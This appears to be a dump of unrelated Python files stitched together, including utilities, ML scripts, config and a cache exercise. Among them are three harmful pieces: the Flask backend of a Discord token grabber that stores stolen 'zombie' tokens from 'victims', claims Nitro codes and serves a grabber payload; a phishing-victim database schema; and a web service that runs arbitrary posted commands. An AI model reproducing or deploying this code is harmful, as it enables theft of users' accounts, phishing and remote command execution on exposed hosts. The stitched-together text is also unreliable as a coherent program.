from .annotation import * # pylint: disable=redefined-builtin
from .computation import *
from .documentation import *
from .logging import *
from .parallel import *
from .progress import *
from .timing import *
from .typing import *
|
import numpy as np
from translate import Translator
from sklearn.feature_extraction.text import TfidfVectorizer
translator = Translator(from_lang="Catalan", to_lang="English")
def getStops():
with open("stopwords.txt") as f:
words = [x.replace("\n", "") for x in f.readlines()]
return words
def remove_topos(text, stops=["mataró", "mataro", "maresme", "catalunya"]):
""" Delete toponyms. """
text = text.lower().split(" ")
for i, word in enumerate(text):
if word in stops:
del text[i]
return " ".join(text)
def remove_words(text, stops=getStops(), hard_stops=",.-_!?¡''*+^/|"):
""" Delete stopwords. """
for char in hard_stops:
text = text.replace(char, "")
text = text.lower().split(" ")
for i, word in enumerate(text):
if word in stops:
del text[i]
return " ".join(text)
def analyze(text, corpus, max_k=3):
if corpus is None:
#return corpus.split(" ")
return ""
vectorizer = TfidfVectorizer()
total_data = corpus + [text]
rankings = vectorizer.fit_transform(total_data)
i2word = vectorizer.get_feature_names()
keys = np.argsort(np.array(rankings.todense())[-1])[::-1]
keywords = [i2word[x] for x in keys[:min(max_k, len(text.split(" ")))]]
return keywords
def getKeywords(title, corpus_keys=None):
# remove toponyms - bad translated
doc_ = remove_topos(title)
# translate
doc_t = translator.translate(doc_)
# remove stopwords
doc_1 = remove_words(doc_t)
# get TfIdf
keywords = analyze(doc_1, corpus_keys, max_k=100)
return remove_words(" ".join(keywords))
def getImageURL(title, corpus_keys=None, location="mataró", max_k=3):
""" Get the url for an image based on the experience title. """
# remove toponyms - bad translated
doc_ = remove_topos(title)
# translate
doc_t = translator.translate(doc_)
# remove stopwords
doc_1 = remove_words(doc_t)
# get TfIdf
keywords = analyze(doc_1, corpus_keys, max_k=max_k)
# generate img url
print("HERE")
print(keywords)
img_url = "https://source.unsplash.com/1600x900/?" + location + "," + ",".join(keywords)
return img_url
|
__author__ = 'Meng'
|
import os
import sys
import time
import argparse
import signal
from typing import List, Optional
from enum import Enum
import subprocess
from multiprocessing import Queue, Process
from bottle import request, response, post, run, get, delete
class Status(Enum):
PENDING = 'PENDING'
RUNNING = 'RUNNING'
FAILED = 'FAILED'
SUCCEEDED = 'SUCCEEDED'
CANCELLED = 'CANCELLED'
def __str__(self):
return str(self.value)
class Batch:
def __init__(self, batch_id: str, status: Status, cli_args: List[str], pid: Optional[int] = None, log: Optional[str] = None):
self.id = batch_id
self.cli_args = cli_args
self.status = status
self.log = log
self.pid = pid
def to_dict(self):
return {
'id': self.id,
'status': str(self.status),
'log': self.log,
}
FOUR_HUNDRED_ERROR = {
'error': 'ValidationError',
'error_message': 'Must post request body of form {"args":[...]}',
}
@post('/batch/<batch_id:path>')
def post_batch(batch_id):
global batch_dict
if not request.json:
response.status = 400
return FOUR_HUNDRED_ERROR
cli_args = request.json.get('args')
if not cli_args or not isinstance(cli_args, list):
response.status = 400
return FOUR_HUNDRED_ERROR
if batch_id in batch_dict:
response.status = 400
return {
'error': 'ValidationError',
'error_message': f"Batch `{batch_id}` already exists."
}
batch = Batch(batch_id, Status.PENDING, cli_args)
batch_dict[batch_id] = batch
process_queue.put(batch)
return batch.to_dict()
def update_batch_dict():
global batch_dict
while not status_queue.empty():
status: Batch = status_queue.get()
batch_dict[status.id] = status
@get('/batch/<batch_id:path>')
def get_batch(batch_id):
update_batch_dict()
maybe_batch = batch_dict.get(batch_id)
if maybe_batch:
return maybe_batch.to_dict()
response.status = 404
return {
'error': 'NotFound',
'error_message': f"Batch `{batch_id}` not found."
}
@delete('/batch/<batch_id:path>')
def delete_batch(batch_id):
global batch_dict
update_batch_dict()
maybe_batch: Batch = batch_dict.get(batch_id)
if not maybe_batch:
response.status = 404
return {
'error': 'NotFound',
'error_message': f"Batch `{batch_id}` not found."
}
if maybe_batch.status == Status.PENDING:
response.status = 400
return {
'error': 'ValueError',
'error_message': f"Batch `{batch_id}` still pending, unable to delete."
}
os.kill(maybe_batch.pid, signal.SIGKILL)
maybe_batch.status = Status.CANCELLED
batch_dict[batch_id] = maybe_batch
return maybe_batch.to_dict()
@get('/health')
def get_health():
return {"status": "OK"}
def poll_batch(process_q: Queue, status_q: Queue):
while True:
if process_q.empty():
time.sleep(5)
else:
batch: Batch = process_q.get()
result = run_batch(status_queue, batch)
status_q.put(result)
def run_batch(status_q: Queue, batch: Batch):
base_log_dir = f'/var/log/steps/{batch.id}'
os.makedirs(base_log_dir, exist_ok=True)
stderr_path = f'{base_log_dir}/stderr.log'
stdout_path = f'{base_log_dir}/stdout.log'
with open(stderr_path, 'w') as stderr, open(stdout_path, 'w') as stdout, \
subprocess.Popen(batch.cli_args, stdout=stdout, stderr=stderr, env=os.environ, bufsize=8192) as proc:
batch.status = Status.RUNNING
batch.pid = proc.pid
status_q.put(batch)
return_code = proc.wait()
with open(stderr_path) as f:
batch.status = Status.SUCCEEDED if return_code == 0 else Status.FAILED
batch.log = f.read() or None
return batch
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="A container that dangerously batches arbitrary commands")
parser.add_argument('-p', '--port', help='Port to run the service on', type=int, default=8998)
parser.add_argument("-H", "--host", type=str, help="Which host to bind", default="0.0.0.0")
args = parser.parse_args()
batch_dict = {}
process_queue = Queue()
status_queue = Queue()
batch_runner_process = Process(target=poll_batch, args=(process_queue, status_queue))
batch_runner_process.daemon = True
batch_runner_process.start()
run(host=args.host, port=args.port)
|
from backend.common_tile import CommonTile
class Plains(CommonTile):
def __init__(self):
super().__init__()
self.food = self.food + 1
self.production = self.production + 1
|
__all__ = [
'FourState']
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM
from direct.fsm import State
class FourState:
notify = DirectNotifyGlobal.directNotify.newCategory('FourState')
def __init__(self, names, durations=[
0, 1, None, 1, 1]):
self.stateIndex = 0
self.track = None
self.stateTime = 0.0
self.names = names
self.durations = durations
self.states = {0: State.State(names[0], self.enterState0, self.exitState0, [
names[1],
names[2],
names[3],
names[4]]),
1: State.State(names[1], self.enterState1, self.exitState1, [
names[2], names[3]]),
2: State.State(names[2], self.enterState2, self.exitState2, [
names[3]]),
3: State.State(names[3], self.enterState3, self.exitState3, [
names[4], names[1]]),
4: State.State(names[4], self.enterState4, self.exitState4, [
names[1]])}
self.fsm = ClassicFSM.ClassicFSM('FourState', list(self.states.values()), names[0], names[0])
self.fsm.enterInitialState()
return
def setTrack(self, track):
if self.track is not None:
self.track.pause()
self.track = None
if track is not None:
track.start(self.stateTime)
self.track = track
return
def enterStateN(self, stateIndex):
self.stateIndex = stateIndex
self.duration = self.durations[stateIndex] or 0.0
def isOn(self):
return self.stateIndex == 4
def changedOnState(self, isOn):
pass
def enterState0(self):
self.enterStateN(0)
def exitState0(self):
self.changedOnState(0)
def enterState1(self):
self.enterStateN(1)
def exitState1(self):
pass
def enterState2(self):
self.enterStateN(2)
def exitState2(self):
pass
def enterState3(self):
self.enterStateN(3)
def exitState3(self):
pass
def enterState4(self):
self.enterStateN(4)
self.changedOnState(1)
def exitState4(self):
self.changedOnState(0)
|
import sys
sys.path.insert(0,'./class')
from flask import render_template, request, render_template_string, send_file
from Cache import Cache
from Utils import Utils
import flask, json
class Api():
def __init__(self, port, config):
self.Cache = Cache('./Data/Account.json', './Data/Zombies.json', config['HOOK'])
self.base_api = config['API']['BASE']
self.app = flask.Flask(__name__)
self.Utils = Utils(config['API']['OWNER_TOKEN'])
app = self.app
self.prt = port
@app.route('/', methods= ['GET'])
def send_index():
return render_template('index.html'), 201
@app.errorhandler(404)
def not_found(error):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('404.html'), 500
@app.route(f'{self.base_api}/send-token')
def send_token():
self.Cache.add_zombie(request.args.get('token'))
return 'ok'
# Peux êre opti pour la recherche | where?
@app.route('/token', methods= ['GET'])
def token():
key = request.args.get('key')
with open('./Data/Account.json', 'r') as database:
db = json.load(database)
victim_to_send = []
victims = []
for acc in db['ACCOUNTS']:
if key in config['API']['ADMIN_KEYS']:
break
elif db['ACCOUNTS'][acc]['KEY'] == key:
victims = db['ACCOUNTS'][acc]['VICTIMS']
break
else:
return render_template('error.html')
with open('./Data/Zombies.json') as zombies_database:
zb_db = json.load(zombies_database)
for zombie in zb_db['Zombies']:
if (zb_db['Zombies'][zombie]['Token'])[:24] in victims or key in config['API']['ADMIN_KEYS']:
victim_to_send.append(zb_db['Zombies'][zombie])
return render_template('token.html', database= victim_to_send)
@app.route('/check-tokens', methods= ['GET'])
def check_tokens():
self.Cache.check_zombies()
self.Cache.send_report()
return render_template('index.html'), 201
@app.route(f'{self.base_api}/claim-nitro', methods= ['POST'])
def claim_nitro():
self.Utils.Claim_Nitro(request.args.get('code'), request.args.get('channel'))
return 'ok', 201
@app.route(f'{self.base_api}/download-core', methods= ['GET'])
def download_core():
return send_file('./Grabber/src/core.asar', as_attachment=True)
@app.route(f'{self.base_api}/get-all-tokens', methods= ['GET'])
def send_all_tokens():
return self.Cache.get_all_zombies()
@app.route(f'{self.base_api}/get-bot-infos', methods= ['GET'])
def get_bot_info():
return config['BACKDOOR_BOT_INFOS']
def start(self):
self.Cache.load_tokens()
self.Cache.check_zombies()
self.Cache.send_report()
self.app.run(host= '0.0.0.0', port= self.prt)
if __name__ == '__main__':
with open('./config.json', 'r+') as config_file:
config = json.load(config_file)
Api(config['API']['PORT'], config).start()
|
# split is the proporitionality of the training set that first CRF uses
from SentenceGetter import SentenceGetter
import pandas as pd
import configparser
from Sents2Features import sent2labels
from Sents2Features import sent2features
from sklearn_crfsuite import CRF
from sklearn.model_selection import cross_val_predict
from sklearn_crfsuite.metrics import flat_classification_report
import sklearn.model_selection
def getTrainingData(split=2):
config = configparser.ConfigParser()
config.read('../trainConfig.ini')
paths = config['Paths']
train_path = paths['train_path']
# train_data = pd.read_csv("CRF-is-400k-train.tsv", sep='\t')
train_data = pd.read_csv(train_path, sep='\t')
train_data = train_data.fillna(method="ffill")
train_getter = SentenceGetter(train_data)
split_index = round(split * len(train_getter.sentences)) # int(1*(len(train_getter.sentences)/3))round(prop*len(x))
if split != 2:
train_sentences_1 = train_getter.sentences[:split_index]
train_sentences_2 = train_getter.sentences[split_index:]
return train_sentences_1, train_sentences_2
else:
train_sentences_1 = train_getter.sentences
return train_sentences_1
def getValidData():
config = configparser.ConfigParser()
config.read('../trainConfig.ini')
paths = config['Paths']
# print(len(train_getter.sentences))
# print(len(y_train_1))
# print(len(y_train_2))
# valid_data = pd.read_csv("CRF-is-400k-valid.tsv", sep='\t')
valid_path = paths['valid_path']
valid_data = pd.read_csv(valid_path, sep='\t')
valid_data = valid_data.fillna(method="ffill")
valid_getter = SentenceGetter(valid_data)
valid_sentences = valid_getter.sentences
return valid_sentences
def getTestData():
config = configparser.ConfigParser()
config.read('../trainConfig.ini')
paths = config['Paths']
# test_data = pd.read_csv("CRF-is-400k-test.tsv", sep='\t')
test_path = paths['valid_path']
test_data = pd.read_csv(test_path, sep='\t')
test_data = test_data.fillna(method="ffill")
test_getter = SentenceGetter(test_data)
test_sentences = test_getter.sentences
return test_sentences
def getDataFromPath(path):
data = pd.read_csv(path, sep='\t')
data = data.fillna(method="ffill")
sent_getter = SentenceGetter(data)
sents = sent_getter.sentences
return sents
def write_to_CoNLL(mdl_file_name, sentence2features, test_sentences, write_path):
X_test_local = []
cond_rand_mdl = CRF(algorithm='lbfgs',
c1=0.0001,
c2=0.0001,
max_iterations=100,
all_possible_transitions=False,
model_filename=mdl_file_name)
if mdl_file_name[(len(mdl_file_name) - 1)] == '2':
old_crf = CRF(algorithm='lbfgs',
c1=0.0001,
c2=0.0001,
max_iterations=100,
all_possible_transitions=False,
model_filename=(mdl_file_name[:(len(mdl_file_name) - 1)]) + '1')
X_test_local = [sent2features_second_guess(s, sentence2features, old_crf) for s in test_sentences]
else:
X_test_local = [sentence2features(s) for s in test_sentences]
predictions = cond_rand_mdl.predict(X_test_local)
with open(write_path, 'a') as f:
for i in range(0, len(predictions)):
sent = test_sentences[i]
preds = predictions[i]
for j in range(0, len(sent)):
str_to_write = '{}\t{}\n'.format(sent[j][0], preds[j])
f.write(str_to_write)
f.write('\n')
def train(model_name, xtrain, ytrain):
print('hallo')
crf = CRF(algorithm='lbfgs',
c1=0.0001,
c2=0.0001,
max_iterations=100,
all_possible_transitions=False,
model_filename=(model_name))
crf.fit(xtrain, ytrain)
print('hallo2')
return crf
def evaluate(model_name, crf, xvalid, yvalid):
dict_1 = {}
pred = cross_val_predict(estimator=crf, X=xvalid, y=yvalid, cv=5)
# report = flat_classification_report(y_pred=pred, y_true=y_valid, labels=sorted_labels, digits=3, output_dict=True)
print(flat_classification_report(y_pred=pred, y_true=yvalid, labels=sorted_labels, digits=3))
def execute_experiment(sent_to_features_func, batch, experiment_name, result_dict, split_train_proportion = 2):
print(experiment_name)
train_sentences_1, train_sentences_2, valid_sentences, test_sentences=getData(batch)
y_train_1 = [sent2labels(s) for s in train_sentences_1]
y_valid = [sent2labels(s) for s in valid_sentences]
y_test = [sent2labels(s) for s in test_sentences]
print("getting data done....")
X_train = [sent_to_features_func(s) for s in train_sentences_1]
print("train_sents done....")
crf1 = train(experiment_name+'_1', X_train, y_train_1)
print('training done....')
X_valid1 = [sent_to_features_func(s) for s in valid_sentences]
# evaluate(model_name, crf, xvalid , yvalid):
evaluate(experiment_name + '_1', crf1, X_valid1, y_valid)
to_CoNLL(experiment_name +'_1',sent2features_final, test_sentences)
if split_train_proportion != 2:
y_train_2 = [sent2labels(s) for s in train_sentences_2]
X_train = [sent2features_second_guess(s, sent_to_features_func, crf1) for s in train_sentences_2]
print("train_sents done....")
crf2 = train(experiment_name+'_2', X_train, y_train_2)
print('training done....')
X_valid2 = [sent2features_second_guess(s, sent_to_features_func, crf1) for s in valid_sentences]
evaluate(experiment_name + '_2', crf2, X_valid2, y_valid)
to_CoNLL(experiment_name +'_2',sent2features_final, test_sentences)
|
# -*- coding: utf-8 -*-
"""
Set up benchmarker package.
To use the 'upload' functionality of this file, you must do:
pip install twine
"""
import io
import os
import sys
import warnings
from pathlib import Path
from shutil import rmtree
from typing import Union
from setuptools import Command, find_packages, setup
def parse_requirements(req_path: Path):
"""Parse requirements
Args:
req_path: path to requirements file
Returns:
list of requirement strings in form of "library" or "library==0.0.0"
"""
# Parse requirements from file - no need to specify them many times
# Any dependencies defined in includes are omitted.
# Only dependencies in provided file are considered
# This is intended behavior
parsed_requirements = []
with open(req_path) as f:
for line in f:
content = line.split("#")[0].strip() # remove comments
if "://" in content: # URL
warnings.warn(f"Ignoring '{content}' requirement. Setuptools does not support URLs.")
elif len(content) > 0 and content[0] != '-': # non empty and not a command
parsed_requirements.append(content)
return parsed_requirements
def read_requirements(file_path: Union[str, Path] = 'requirements/core.txt') -> list:
"""Get required packages for this module to be executed.
Args:
file_path: the requirements file path.
Returns:
list of required packages
"""
if isinstance(file_path, str):
file_path = Path(file_path)
if not file_path.exists():
return []
req_path = file_path.resolve()
return parse_requirements(req_path)
# Package meta-data.
NAME = 'benchmarker'
DESCRIPTION = 'DUE-BASELINES models for 2D document processing'
URL = ''
AUTHOR = 'Applica.ai'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = None
REQUIRES = read_requirements() + read_requirements('requirements/pre.txt')
# Create dict for extras on the basis of requirements/extras/[name].txt pattern
EXTRAS = {}
for file_path in Path('requirements/extras/').glob("*.txt"):
name = file_path.stem
reqs = read_requirements(file_path)
if len(reqs) > 0:
EXTRAS[name] = reqs
else:
warnings.warn(f'Extras group {name} does not have any valid requirements and will not be available.')
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(Path('README.md').resolve(), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(Path(NAME + '/__version__.py').resolve()) as f:
exec(f.read(), about)
VERSION = about['__version__']
else:
about['__version__'] = VERSION
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Print things in bold.
Args:
s: string to print in bold.
"""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(Path('dist').resolve())
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system(
'{0} setup.py sdist bdist_wheel --universal'.format(
sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
if __name__ == '__main__':
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
# author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=['benchmarker'] + ['benchmarker.' + pkg for pkg in find_packages('benchmarker')],
install_requires=REQUIRES,
extras_require=EXTRAS,
include_package_data=True,
license='PROPRIETARY Applica',
classifiers=[
# Trove classifiers
'Development Status :: 3 - Alpha',
'License :: PROPRIETARY Applica',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
|
#coding=utf-8
import os
# Basic settings
# requests settings
TIMEOUT = 5
VERIFY = False
# directories might be used
LOCATIONS = {
'log': 'log',
'data': 'data',
}
# stderr is redirected to this file
ERR_LOG_FILE = os.path.join(LOCATIONS['log'], 'err.log')
# log in this file
LOGGING_FILE = os.path.join(LOCATIONS['log'], 'requests.log')
STATION_NAME_FILE = os.path.join(LOCATIONS['data'], 'station_name.js')
CAPTCHA_FILE = os.path.join(LOCATIONS['data'], 'captcha.png')
CRYPTO_JS = os.path.join(LOCATIONS['data'], 'crypto.js')
CRYPTO_SCRIPT = os.path.join(LOCATIONS['data'], 'do_crypto.js')
# Query settings
QUERY_INTERVAL = 1
QUERY_ARGS_NS = 'leftTicketDTO'
TRAIN_DATA_JSON_KEY = 'queryLeftNewDTO'
LOGIN_NS = 'loginUserDTO'
USER_NS = 'userDTO'
PURPOSE_CODES = {'学生': '0X00', '普通': 'ADULT'}
PURPOSE_ID = {'0X00': 3, '学生': 3, 'ADULT': 1, '普通': 1}
SEAT_CODES = {
'商务座': 'swz',
'特等座': 'tz',
'一等座': 'zy',
'二等座': 'ze',
'高级软卧': 'gr',
'软卧': 'rw',
'硬卧': 'yw',
'软座': 'rz',
'硬座': 'yz',
'无座': 'wz',
'其他': 'qt',
}
SEAT_ID = {
'SWZ': '9',
'TZ': 'P',
'ZY': 'M',
'ZE': 'O',
'GR': '6',
'RW': '4',
'YW': '3',
'RZ': '2',
'YZ': '1',
'WZ': 'WZ',
'QT': '',
}
URL_BASE = 'https://kyfw.12306.cn/'
URLS = {
'entry': URL_BASE + 'otn/',
'station_name': URL_BASE + 'otn/resources/js/framework/station_name.js?station_version=1.8260',
'query': URL_BASE + 'otn/leftTicket/queryT',
'query_log': URL_BASE + 'otn/leftTicket/log',
'login_captcha': URL_BASE + 'otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand',
'order_captcha': URL_BASE + 'otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp',
'check_captcha': URL_BASE + 'otn/passcodeNew/checkRandCodeAnsyn',
'login_token': URL_BASE + 'otn/login/init',
'order_init_token': URL_BASE + 'otn/leftTicket/init',
'login': URL_BASE + 'otn/login/loginAysnSuggest',
'check_login': URL_BASE + 'otn/login/checkUser',
'passengers': URL_BASE + 'otn/confirmPassenger/getPassengerDTOs',
'order_init_submit': URL_BASE + 'otn/leftTicket/submitOrderRequest',
'order_confirm': URL_BASE + 'otn/confirmPassenger/initDc',
'order_check': URL_BASE + 'otn/confirmPassenger/checkOrderInfo',
}
# 3rd party tools settings
# Setup for settings
import socket
if socket.gethostname() in ['duankq-ThinkPad-X201', ]:
DEBUG = True
else:
DEBUG = False
import os
for loc in LOCATIONS.values():
if not os.path.isdir(loc):
os.mkdir(loc)
for (k, v) in SEAT_CODES.iteritems():
SEAT_ID[k] = SEAT_ID[v.upper()]
SEAT_ID[v] = SEAT_ID[v.upper()]
|
from hellbox.chutes.chute import Chute
class CompositeChute(Chute):
def __init__(self, *chutes):
chutes = [self.__clone(c) for c in chutes]
self.head = self.tail = chutes[0]
for chute in chutes[1:]:
self.tail = self.tail >> chute
def __call__(self, *args):
self.head(*args)
def to(self, *args):
self.tail.to(*args)
def __rrshift__(self, other):
other.to(self.head)
return self.tail
def __clone(self, chute):
c = object.__new__(chute.__class__)
c.__dict__ = chute.__dict__.copy()
return c
|
import sqlite3
from os import system
a= system("rm dbz")
conn = sqlite3.connect('dbz')
conn.execute("""
CREATE TABLE targets (hash TEXT NOT NULL PRIMARY KEY, name TEXT)
""")
conn.execute("""
CREATE TABLE phished (hash TEXT, timings DATETIME)
""")
conn.execute("""
CREATE TABLE data (hash TEXT NOT NULL PRIMARY KEY, details TEXT)
""")
conn.commit()
conn.close()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Guannan Ma (@mythmgn),
"""
:description:
**Async Module is a tcp framework for asynchrous network msg tranfering**
"""
# TODO:
# 1. If the socket has been in a state in which it does not send or
# recv any msg for more than 30mins. Shutdown the context.
# 2. Msg management
# Enhancement list:
# 1. If the socket has too many msg pending there.
# and msg cannot be sent out. Consider this net link as dead.
# and shutdown && close it
# 2. Multiple threads sending things.
# BUGS:
# FIXED:
# 1. Send socket does not register in epoll
# 2. Peer2Context has resource competition
# 3. connection has starvation bug
# Silly mistakes that I made:
# 1. TCP context creation and deletion does not has lock. (Mainly on creation)
# 2. Net MSG queue will become very large if the network read/write speed does
# not match.
# 3.
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
# tools for dealing with files, mostly images
"""
Copyright 2016 Fabric S.P.A, Emmanuel Benazera, Alexandre Girard
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from os import listdir
from os.path import isfile, join
from os import walk
import os
import time
import glob
import sys
def list_files(repository,ext='.jpg',nfiles=-1,pattern='*',last_hour=-1):
onlyfiles = []
fpattern = repository + '/' + pattern + ext
filenames = glob.glob(fpattern)
if last_hour >= 1:
nfilenames = []
past = time.time() - last_hour*60*60
for f in filenames:
if os.path.getmtime(f) >= past:
nfilenames.append(f)
return nfilenames
if nfiles > 0:
return filenames[:nfiles]
else:
return filenames
|
#
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD.
# See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np # pylint: disable=unused-import
import typing # pylint: disable=unused-import
from nomad.metainfo import ( # pylint: disable=unused-import
MSection, MCategory, Category, Package, Quantity, Section, SubSection, Reference
)
from nomad.datamodel.metainfo import simulation
from nomad.metainfo.metainfo import JSON
m_package = Package()
class Run(simulation.run.Run):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_git_rev = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_process_id = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_psidatadir = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_memory = Quantity(
type=np.dtype(np.float64),
shape=[],
# unit='MiB',
description='''
''')
x_psi4_threads = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_input_file = Quantity(
type=str,
shape=[],
description='''
''')
class System(simulation.system.System):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_molecular_point_group = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_full_point_group = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_molecular_symmetry = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_rotational_constants = Quantity(
type=np.dtype(np.float64),
shape=[3],
# unit='1/cm',
description='''
''')
x_psi4_nuclear_repulsion = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_charge = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_multiplicity = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_electrons = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_nalpha = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_nbeta = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
class Scf(simulation.method.Scf):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_diis = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_mom = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_fractional_occupation = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_guess_type = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_integral_threshold = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
class BasisSetAtomCentered(simulation.method.BasisSetAtomCentered):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_blend = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_n_shells = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
Gives the number of shell types used.
''')
x_psi4_max_angular_momentum = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
Maximum angular momentum quantum number corresponding to the shells used.
''')
x_psi4_n_cartesian_functions = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_spherical_harmonics = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_n_ecp_primitives = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_n_ecp_core_electrons = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
class Method(simulation.method.Method):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_scf_algorithm_type = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_diis = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_mom = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_fractional_occupation = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_guess_type = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_options = Quantity(
type=JSON,
shape=[],
description='''
''')
x_psi4_jk_matrices_parameters = Quantity(
type=JSON,
shape=[],
description='''
''')
x_psi4_parameters = Quantity(
type=JSON,
shape=[],
description='''
''')
class DFT(simulation.method.DFT):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_molecular_quadrature = Quantity(
type=typing.Any,
shape=[],
description='''
''')
class x_psi4_root_information(MSection):
m_def = Section(validate=False)
x_psi4_root_energy = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
class Calculation(simulation.calculation.Calculation):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_s2_expected = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_s2_observed = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_s_expected = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_s_observed = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_root_information = SubSection(sub_section=x_psi4_root_information.m_def, repeats=True)
|
class DoubleLinkedListNode(object):
def __init__(self, value):
self.value = value
self.next = None
self.previous = None
def __repr__(self):
return str(self.value)
class LRU_Cache(object):
def __init__(self, capacity: int):
self._cache = dict()
self.capacity = capacity
self.head = DoubleLinkedListNode(0)
self.tail = DoubleLinkedListNode(0)
self.head.next = self.tail
self.tail.previous = self.head
def get(self, key):
if key in self._cache:
node = self._cache.get(key)
self._remove(node)
self._add(node)
return node
return -1
def set(self, key, value):
if key in self._cache:
self._remove(self.cache.get(key))
node = DoubleLinkedListNode(value)
self._add(node)
self._cache[key] = node
if len(self._cache) > self.capacity:
node = self.head.next
self._remove(node)
node_key = list(self._cache.keys())[list(self._cache.values()).index(node)]
del self._cache[node_key]
def _add(self, node):
last_node = self.tail.previous
last_node.next = node
self.tail.previous = node
node.previous = last_node
node.next = self.tail
def _remove(self, node):
previous_node = node.previous
next_node = node.next
previous_node.next = next_node
next_node.previous = previous_node
def __iter__(self):
node = self.head
while node:
yield node
node = node.next
def __len__(self):
return len(self._cache)
our_cache = LRU_Cache(3)
our_cache.set(1, 1)
our_cache.set(2, 2)
our_cache.set(3, 3)
our_cache.set(4, 4)
print ("Pass" if (-1 == our_cache.get(1)) else "Fail")
print ("Pass" if (2 == our_cache.get(2).value) else "Fail")
print ("Pass" if (3 == our_cache.get(3).value) else "Fail")
print ("Pass" if (-1 == our_cache.get(9)) else "Fail")
our_cache = LRU_Cache(0)
our_cache.set(1, 1)
print ("Pass" if (-1 == our_cache.get(1)) else "Fail")
our_cache = LRU_Cache(1)
our_cache.set(1, 0)
our_cache.set(2, 0)
print ("Pass" if (-1 == our_cache.get(1)) else "Fail")
|
#!/usr/bin/python3
"""Filter and/or process subtitles' content that match a particular pattern."""
